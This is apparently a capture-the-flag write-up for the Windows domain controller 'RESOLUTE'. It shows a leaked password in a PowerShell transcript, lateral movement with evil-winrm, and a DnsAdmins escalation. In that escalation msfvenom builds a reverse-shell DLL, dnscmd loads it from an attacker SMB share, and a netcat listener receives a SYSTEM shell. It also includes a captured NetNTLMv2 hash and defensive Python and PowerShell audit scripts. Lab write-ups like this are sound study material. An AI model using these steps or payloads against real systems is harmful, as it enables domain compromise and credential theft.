Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
*Evil-WinRM* PS C:\Users\melanie\Desktop>
  • Assessment
    • Traces of a net use command found in the PowerShell transcript logs
      • This looks usable for lateral movement
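
The transcript above records exactly what a transcript audit should catch: a secret passed as a positional argument on a command line, stored in a directory an ordinary domain user can read. The following Python is an added example for this write-up, not part of the original post or of any tool it mentions. It scans text in the layout of `PowerShell_transcript.*.txt` files for inline credentials and reports them with the secret masked; the sample transcript is constructed to match the layout shown above, and `Placeh0lder-Secret!` is a placeholder. It goes slightly beyond the page by handling both the Invoke-Expression parameter-binding form seen here (remoting sessions) and the `PS C:\path> command` form of interactive transcripts.

```python
import re

# Constructed sample in the layout of PowerShell_transcript.*.txt, with a
# placeholder secret. Remoting sessions (wsmprovhost) log each command as an
# Invoke-Expression parameter binding; interactive sessions log "PS path> cmd".
SAMPLE_TRANSCRIPT = r'''**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
**********************
**********************
Command start time: 20191203063455
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="Get-ChildItem C:\Users
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Placeh0lder-Secret!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
**********************
Command start time: 20191203063540
**********************
PS C:\Users\ryan> sqlcmd -S db01 -U svc_backup -P Placeh0lder-Secret!
**********************
Command start time: 20191203063600
**********************
PS C:\Users\ryan> $s = ConvertTo-SecureString 'Placeh0lder-Secret!' -AsPlainText -Force
**********************
'''

CMD_START = re.compile(r"^Command start time: (\d{14})\s*$", re.M)
# Command logged via Invoke-Expression: the value may span lines; its first line
# is the command, the rest is the remoting client's exit-code wrapper.
BOUND_CMD = re.compile(
    r'ParameterBinding\(Invoke-Expression\): name="Command"; value="(.*?)"\s*$',
    re.S | re.M)
# Command logged after an interactive prompt, excluding engine trace lines.
PROMPT_CMD = re.compile(
    r"^PS(?: [^>\n]*)?>\s*(?!CommandInvocation\(|ParameterBinding\(|TerminatingError\()(\S.*)$",
    re.M)

# (rule name, pattern whose "secret" group is masked). Positional arguments
# after the UNC path in "net use" are credentials; so are values after
# -p/-password style switches and quoted strings given to ConvertTo-SecureString
# together with -AsPlainText (unquoted ones are not caught by the last rule).
RULES = [
    ("net use with inline credential",
     re.compile(r"(?i)\bnet(?:\.exe)?\s+use\b(?:\s+\S+:)?\s+\\\\\S+\s+"
                r"(?P<secret>(?![/*])\S+(?:\s+(?!/)\S+)*)")),
    ("password switch",
     re.compile(r"(?i)(?:(?:-{1,2}|/)(?:password|passwd|pass|pw|p)\b[\s=:]+|\bpassword\s*=\s*)"
                r"(?P<secret>\S+)")),
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"(?i)ConvertTo-SecureString\b(?=.*-AsPlainText).*?(?P<q>['\"])"
                r"(?P<secret>[^'\"]+)(?P=q)")),
]


def extract_commands(transcript):
    """Yield (start_time, command) for every command recorded in a transcript."""
    starts = list(CMD_START.finditer(transcript))
    for i, m in enumerate(starts):
        end = starts[i + 1].start() if i + 1 < len(starts) else len(transcript)
        block = transcript[m.end():end]
        for bm in BOUND_CMD.finditer(block):
            yield m.group(1), bm.group(1).splitlines()[0].strip()
        for pm in PROMPT_CMD.finditer(block):
            yield m.group(1), pm.group(1).strip()


def audit_transcript(transcript):
    """Return findings for commands carrying inline credentials, secret masked."""
    findings = []
    for start_time, cmd in extract_commands(transcript):
        for name, pattern in RULES:
            m = pattern.search(cmd)
            if m:
                masked = cmd[:m.start("secret")] + "<redacted>" + cmd[m.end("secret"):]
                findings.append({"start_time": start_time, "rule": name,
                                 "command": masked})
                break  # one finding per command is enough for triage
    return findings


if __name__ == "__main__":
    for f in audit_transcript(SAMPLE_TRANSCRIPT):
        print(f"{f['start_time']}  {f['rule']:<40} {f['command']}")
```

Transcription (the "Turn on PowerShell Transcription" policy) is a useful detection source, but transcript output directories need the same access control as other logs, and the audit above is only a backstop: once a secret has been written to disk it should be treated as exposed and rotated.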

Lateral Movement

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents>

Information gathering after lateral movement

whoami

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
  • Assessment
    • ryan is a member of DnsAdmins, so a DNS-based attack looks possible

Investigating DNS

# Check the process
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-Process -Name dns

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   5299    3689    69168      68032               844   0 dns

# Check the dnscmd command
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /Info

Query result:

Server info
        server name              = Resolute.megabank.local
        version                  = 3839000A (10.0 build 14393)
        DS container             = cn=MicrosoftDNS,cn=System,DC=megabank,DC=local
        forest name              = megabank.local
        domain name              = megabank.local
        builtin forest partition = ForestDnsZones.megabank.local
        builtin domain partition = DomainDnsZones.megabank.local
        read only DC             = 0
        last scavenge cycle      = not since restart (0)
  Configuration:
        dwLogLevel               = 00000000
        dwDebugLevel             = 00000000
        dwRpcProtocol            = 00000005
        dwNameCheckFlag          = 00000002
        cAddressAnswerLimit      = 0
        dwRecursionRetry         = 3
        dwRecursionTimeout       = 8
        dwDsPollingInterval      = 180
  Configuration Flags:
        fBootMethod                  = 3
        fAdminConfigured             = 1
        fAllowUpdate                 = 1
        fDsAvailable                 = 1
        fAutoReverseZones            = 1
        fAutoCacheUpdate             = 0
        fSlave                       = 0
        fNoRecursion                 = 0
        fRoundRobin                  = 1
        fStrictFileParsing           = 0
        fLooseWildcarding            = 0
        fBindSecondaries             = 0
        fWriteAuthorityNs            = 0
        fLocalNetPriority            = 1
  Aging Configuration:
        ScavengingInterval           = 0
        DefaultAgingState            = 0
        DefaultRefreshInterval       = 168
        DefaultNoRefreshInterval     = 168
  ServerAddresses:

        Ptr          = 00000192FEBAF370
        MaxCount     = 1
        AddrCount    = 1
                Addr[0] => af=2, salen=16, [sub=0, flag=00000000] p=13568, addr=10.10.10.169

  ListenAddresses:
        NULL IP Array.
  Forwarders:
        NULL IP Array.
        forward timeout  = 3
        slave            = 0
Command completed successfully.

# Check the service
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe query dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents>
  • Assessment
    • DNS is running and we have the rights, so DNS-based privilege escalation looks possible

Privilege Escalation

Kali side

# On Kali, create the DLL that DNS will load when it starts
┌──(kali㉿kali)-[~/Resolute]
└─$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=4444 -f dll --platform windows > rev.dll
# Start an SMB server on Kali; "share" is the share name, ./ is the directory path
┌──(kali㉿kali)-[~/Resolute]
└─$ sudo impacket-smbserver share ./        
[sudo] password for kali: 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,55298)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:0e557196bd8edb9b9b2487eb38d8205a:010100000000000000a92a98f73dda01943a90eda68f9fe60000000001
# Listen with nc in another terminal
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -vlnp 4444
listening on [any] 4444 ...

Victim side

# Register the DLL hosted on Kali's SMB server with dnscmd
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute.megabank.local /config /serverlevelplugindll \\10.10.16.4\share\rev.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.
# Stop DNS
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
# Start DNS
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3184
        FLAGS              :
# Check the ServerLevelPluginDll registry value
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll


ServerLevelPluginDll : \\10.10.16.4\share\rev.dll
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName          : Parameters
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry


# Check the DNS service status
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-Service dns

Status   Name               DisplayName
------   ----               -----------
Running  dns                DNS Server

State on success

# smbserver
┌──(kali㉿kali)-[~/Resolute]
└─$ sudo impacket-smbserver share ./        
[sudo] password for kali: 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,55298)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:0e557196bd8edb9b9b2487eb38d8205a:010100000000000000a92a98f73dda01943a90eda68f9fe600000000010010006d006900520071005400740059006200030010006d00690052007100540074005900620002001000610065005a00510046004b006b00580004001000610065005a00510046004b006b0058000700080000a92a98f73dda0106000400020000000800300030000000000000000000000000400000ca9d33ca5328ab97005c3e74242716f2dbb549652b73135970b0931f6faea6a10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0034000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:SHARE)
[*] Closing down connection (10.10.10.169,55298)
[*] Remaining connections []

# nc
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -vlnp 4444
listening on [any] 4444 ...

connect to [10.10.16.4] from (UNKNOWN) [10.10.10.169] 55299
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
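As a defender-side addition (not part of the original writeup), the following PowerShell audit detects the conditions this escalation relies on: a ServerLevelPluginDll value pointing at a UNC path or outside System32, members of DnsAdmins, and recent DNS Server stop/start events in the System log. It assumes it runs on the DNS server / DC with the ActiveDirectory module installed; the function names are my own.

```powershell
# Added example, not from the original writeup. Audits the DnsAdmins /
# ServerLevelPluginDll abuse path shown above. Assumes: run as an admin on the
# DNS server (DC), ActiveDirectory module available. Function names are hypothetical.

$DnsParamsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Get-DnsPluginDllFinding {
    $value = (Get-ItemProperty -Path $DnsParamsKey -Name ServerLevelPluginDll `
        -ErrorAction SilentlyContinue).ServerLevelPluginDll
    if ([string]::IsNullOrEmpty($value)) {
        return [pscustomobject]@{ Value = ''; Severity = 'OK'; Note = 'No plugin DLL registered' }
    }
    # The DNS service runs as SYSTEM; a UNC path means it loads code from a remote host on start.
    if ($value -like '\\*') {
        $sev = 'Critical'; $note = 'Plugin DLL is loaded from a network share'
    } elseif ($value -notlike "$env:SystemRoot\System32\*") {
        $sev = 'High'; $note = 'Plugin DLL lives outside System32'
    } else {
        $sev = 'Review'; $note = 'Plugin DLL set; confirm it is expected and signed'
    }
    [pscustomobject]@{ Value = $value; Severity = $sev; Note = $note }
}

function Get-DnsAdminsMembers {
    # Any member here can register a plugin DLL with dnscmd, as ryan did above.
    Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
        Select-Object Name, SamAccountName, objectClass
}

function Get-RecentDnsServiceRestarts {
    param([int]$Hours = 24)
    # Service Control Manager event 7036 records service state changes; the abuse needs a stop/start pair.
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager';
        Id = 7036; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -like '*DNS Server*' } |
        Select-Object TimeCreated, Message
}

function Clear-DnsPluginDll {
    # Remediation: remove the value, then restart the DNS Server service so the DLL is no longer loaded.
    Remove-ItemProperty -Path $DnsParamsKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    Restart-Service -Name DNS
}

Get-DnsPluginDllFinding | Format-List
Get-DnsAdminsMembers | Format-Table -AutoSize
Get-RecentDnsServiceRestarts | Format-Table -AutoSize
```

Run against the box state above, the first function reports `\\10.10.16.4\share\rev.dll` as Critical, and the event query shows the stop/start pair produced by the `sc.exe stop dns` / `sc.exe start dns` steps.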
